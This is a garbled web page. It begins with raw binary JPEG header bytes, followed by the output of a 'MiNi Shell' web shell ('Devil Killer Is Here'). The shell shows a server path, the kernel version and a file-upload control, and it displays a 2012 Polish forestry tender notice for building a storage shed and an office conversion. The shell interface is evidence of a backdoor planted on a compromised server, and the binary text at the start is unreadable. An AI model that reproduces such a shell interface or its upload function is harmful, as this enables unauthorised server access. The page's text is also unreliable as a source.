JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120817/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120817/178385-N-2012.html

<p class="kh_header"><b>Tuszyma: WYKONANIE ROBÓT BUDOWLANYCH:
CZĘŚĆ 1. BUDOWA WIATY MAGAZYNOWEJ WRAZ Z WEWNĘTRZNĄ INSTALACJĄ ELEKTRONICZNĄ POLICZNIKOWĄ W LEŚNICTWIE PRZECŁAW
CZĘŚĆ 2. ROZBUDOWA, PRZEBUDOWA I ZMIANA SPOSOBU UŻYTKOWANIA CZĘŚCI BUDYNKU GOSPODARCZEGO NA POMIESZCZENIA BIUROWE (KANCELARIĘ LEŚNICTWA KAMIONKA)</b><br>
<b>Numer ogłoszenia: 178385 - 2012; data zamieszczenia: 17.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Tuszyma , Tuszyma 147, 39-321 Tuszyma, tel. (0-17) 5813111.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.krosno.lasy.gov.pl/web/tuszyma</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Lesne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE ROBÓT BUDOWLANYCH:
CZĘŚĆ 1. BUDOWA WIATY MAGAZYNOWEJ WRAZ Z WEWNĘTRZNĄ INSTALACJĄ ELEKTRONICZNĄ POLICZNIKOWĄ W LEŚNICTWIE PRZECŁAW
CZĘŚĆ 2. ROZBUDOWA, PRZEBUDOWA I ZMIANA SPOSOBU UŻYTKOWANIA CZĘŚCI BUDYNKU GOSPODARCZEGO NA POMIESZCZENIA BIUROWE (KANCELARIĘ LEŚNICTWA KAMIONKA).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> część 1. Budowa wiaty magazynowej wraz z wewnętrzną instalacją elektroniczną policznikową w leśnictwie Przecław:
Wiata magazynowa przeznaczona do przechowywania maszyn i urządzeń służących do prac szkółkarskich.
Obiekt jednokondygnacyjny parterowy konstrukcji stalowej.
Dach dwuspadowy. Nachylenie połaci dachowej wynosi 21,8o.
Konstrukcja stalowa z obudową ścienną z blachy. Pokrycie dachowe z blachy trapezowej powlekanej TR 40/183.
Wysokość wiaty od poziomu terenu do kalenicy wynosi 5,50 m.
Wysokość od poziomu terenu do okapu wynosi 3,50 m.
Posadzka z kostki betonowej.
Odprowadzenie wód deszczowych - powierzchniowo na tereny zielone działki inwestora.
Długość 20,00m
Szerokość 10,00 m
Powierzchnia zabudowy wg PN-ISO 9836:1997 200,00 m
Kubatura wg PN-ISO 9836:1997 800,00 m2

DANE KONSTRUKCYJNO-BUDOWLANE.
Obiekt zaprojektowany w technologii tradycyjnej, stalowej. Posadowienie na stopach fundamentowych żelbetowych. Konstrukcję stanowią:
- ramy stalowe
- płatwie stalowe
- rygle stalowe.
Dach pokryty blachą trapezowej. Rynny fi 120 - z blachy stalowej ocynkowanej. Rury spustowe fi 100 - z blachy stalowej ocynkowanej w kolorze dachu
Wiata będzie wyposażona w instalację elektryczną i odgromową

część 2. Rozbudowa, Przebudowa i zmiana sposobu użytkowania części budynku gospodarczego na pomieszczenia biurowe (kancelarię leśnictwa Kamionka)
Projektuje się:
1. Rozbudowę budynku o pomieszczenie wiatrołapu, rozbudowę w kierunku wschodnim.
2. Przebudowę budynku.
3. Wykonanie opaski z kostki betonowej lub płyt chodnikowych 50x50x7cm z obrzeżem z krawężnika betonowego wokół budynku.
4. Profilację terenu przy budynku (w związku z wyrównywaniem terenu wokół budynku powiększy się nieznacznie wysokość budynku od poziomu terenu oraz wysokość pomieszczeń parteru z 240 cm na 250 cm).
5. Zmianę sposobu użytkowania części budynku na pomieszczenia biurowe kancelarii leśnictwa.
6. Rozbiórkę płyty gnojowej, od strony południowej budynku.
7. Budowę przyłączy: wodociągowego, kanalizacji sanitarnej oraz energetycznego.
8. Budowę wewnętrznych instalacji: wod-kan, c.o. i elektrycznej. 

Dane techniczne budynku po rozbudowie, przebudowie i zmianie sposobu użytkowania jego części na kancelarię leśnictwa:
Wysokość do kalenicy 609,5 m (po profilacji terenu przy budynku zwiększyła się jego wysokość o 10 cm). 
Wysokość pomieszczeń parteru 250 cm
Powierzchnia zabudowy wg PN-ISO 9836:1997 127,92 m2
Powierzchnia użytkowa biurowa 42,60 m2
Powierzchnia gospodarczo-magazynowa 56,86 m2
Powierzchnia użytkowa całego budynku 99,46 m2
Kubatura wg PN-ISO 9836:1997 481,10 m3

Elewacje.
Ściany zewnętrzne budynku tynkowane tynkiem cienkowarstwowym akrylowym - dla styropianu, malowane farbami elewacyjnymi w jasnym kolorze. Zaproponowano kolorystykę w systemie CERESIT: kolor SAHARA SH4. Cokół obłożony płytkami gresowymi lub okładziną kamienną lub tynkiem mozaikowym żywicznym w kolorze grafitowym.
Parapety zewnętrzne- klinkierowe lub z blachy powlekanej ocynkowanej.

Dach pokryty blachą. Na rysunkach technicznych podane zostały przekroje warstw dachu. Dach w kolorze istniejącym- czerwonym.
Orynnowanie, obróbki blacharskie należy wykonać z blachy stalowej powlekanej. Kolor obróbek, rynien, rur spustowych czerwony.

W budynku przewiduje się następujące instalacje wewnętrzne:
 wodno-kanalizacyjną,
 elektryczną,
 grzewczą
 instalacja ciepłej wody użytkowej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: 
		Część 1: 3 000 zł (słownie: trzy tys. zł).
		Część 2: 3 000 zł (słownie: trzy tys. zł).
Wadium należy wnieść w terminie do dnia 30.08.2012 r do godz. 930.
Wadium może być wnoszone w jednej lub kilku następujących formach:
- pieniądzu: przelewem na rachunek bankowy Zamawiającego: Bank Pekao BP SA O/Mielec 10 1020 4913 0000 9402 0010 3580 z dopiskiem: 
WYKONANIE ROBÓT BUDOWLANYCH:
CZĘŚĆ 1. BUDOWA WIATY W LEŚNICTWIE PRZECŁAW
CZĘŚĆ 2. KANCELARIA LEŚNICTWA KAMIONKA
Wadium uważać się będzie za wniesione jeśli środki w terminie podanym w pkt. VIII.2. znajdą się na rachunku Zamawiającego.
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
 - gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późniejszymi zmianami);
- wadium w formie innej niż pieniądz: oryginał należy złożyć w kasie Nadleśnictwa najpóźniej w dniu otwarcia ofert, a kserokopia dokumentu winna być dołączona do oferty.
4. Zamawiający zwraca wadium:
a) wszystkim wykonawcom niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem pkt. VIII. 5.
b) wykonawcy, którego ofert została wybrana jako najkorzystniejsza, po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy,
c) na wniosek wykonawcy, który wycofał ofertę przed terminem składania ofert.
5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 4 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, iż wynika to z przyczyn nie leżących po jego stronie.
6. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
7. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zawrócono wadium na podstawie pkt. VIII.4 a, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
Ocena dokonana będzie na podstawie treści wymaganego oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, czyli zakończył, co najmniej jedno zamówienie o podobnym charakterze
Ocena dokonana będzie na podstawie treści wymaganego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przez osoby zdolne do wykonania zamówienia uważa się co najmniej:
- Co najmniej dwie osoby mogące wykonywać samodzielne funkcje w budownictwie w zakresie powierzonym przez Zamawiającego 
- Jeżeli wskazane osoby nie są pracownikami Wykonawcy należy przedłożyć ich oświadczenia potwierdzające gotowość do świadczenia pracy/usług na rzecz Wykonawcy w trakcie realizacji zamówienia. 
Ocena dokonana będzie na podstawie treści wymaganych oświadczeń i wykazów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przez osoby zdolne do wykonania zamówienia uważa się co najmniej:
- Co najmniej dwie osoby mogące wykonywać samodzielne funkcje w budownictwie w zakresie powierzonym przez Zamawiającego 
- Jeżeli wskazane osoby nie są pracownikami Wykonawcy należy przedłożyć ich oświadczenia potwierdzające gotowość do świadczenia pracy/usług na rzecz Wykonawcy w trakcie realizacji zamówienia. 
Ocena dokonana będzie na podstawie treści wymaganych oświadczeń i wykazów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że jest ubezpieczony od odpowiedzialności cywilnej (OC) w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - na kwotę co najmniej 100 tys. zł. 
Ocena dokonana będzie na podstawie treści wymaganych oświadczeń, wykazów i dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_tuszyma/index_html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Tuszyma, 39-321 Tuszyma 147.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.08.2012 godzina 13:00, miejsce: Nadleśnictwo Tuszyma, 39-321 Tuszyma 147; Sala konferencyjna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> część 1. Budowa wiaty magazynowej wraz z wewnętrzną instalacją elektroniczną policznikową w leśnictwie Przecław.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wiata magazynowa przeznaczona do przechowywania maszyn i urządzeń służących do prac szkółkarskich.
Obiekt jednokondygnacyjny parterowy konstrukcji stalowej.
Dach dwuspadowy. Nachylenie połaci dachowej wynosi 21,8o.
Konstrukcja stalowa z obudową ścienną z blachy. Pokrycie dachowe z blachy trapezowej powlekanej TR 40/183.
Wysokość wiaty od poziomu terenu do kalenicy wynosi 5,50 m.
Wysokość od poziomu terenu do okapu wynosi 3,50 m.
Posadzka z kostki betonowej.
Odprowadzenie wód deszczowych - powierzchniowo na tereny zielone działki inwestora.
Długość 20,00m
Szerokość 10,00 m
Powierzchnia zabudowy wg PN-ISO 9836:1997 200,00 m
Kubatura wg PN-ISO 9836:1997 800,00 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> część 2. Rozbudowa, Przebudowa i zmiana sposobu użytkowania części budynku gospodarczego na pomieszczenia biurowe (kancelarię leśnictwa Kamionka).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Projektuje się:
1. Rozbudowę budynku o pomieszczenie wiatrołapu, rozbudowę w kierunku wschodnim.
2. Przebudowę budynku.
3. Wykonanie opaski z kostki betonowej lub płyt chodnikowych 50x50x7cm z obrzeżem z krawężnika betonowego wokół budynku.
4. Profilację terenu przy budynku (w związku z wyrównywaniem terenu wokół budynku powiększy się nieznacznie wysokość budynku od poziomu terenu oraz wysokość pomieszczeń parteru z 240 cm na 250 cm).
5. Zmianę sposobu użytkowania części budynku na pomieszczenia biurowe kancelarii leśnictwa.
6. Rozbiórkę płyty gnojowej, od strony południowej budynku.
7. Budowę przyłączy: wodociągowego, kanalizacji sanitarnej oraz energetycznego.
8. Budowę wewnętrznych instalacji: wod-kan, c.o. i elektrycznej. 

Dane techniczne budynku po rozbudowie, przebudowie i zmianie sposobu użytkowania jego części na kancelarię leśnictwa:
Wysokość do kalenicy 609,5 m (po profilacji terenu przy budynku zwiększyła się jego wysokość o 10 cm). 
Wysokość pomieszczeń parteru 250 cm
Powierzchnia zabudowy wg PN-ISO 9836:1997 127,92 m2
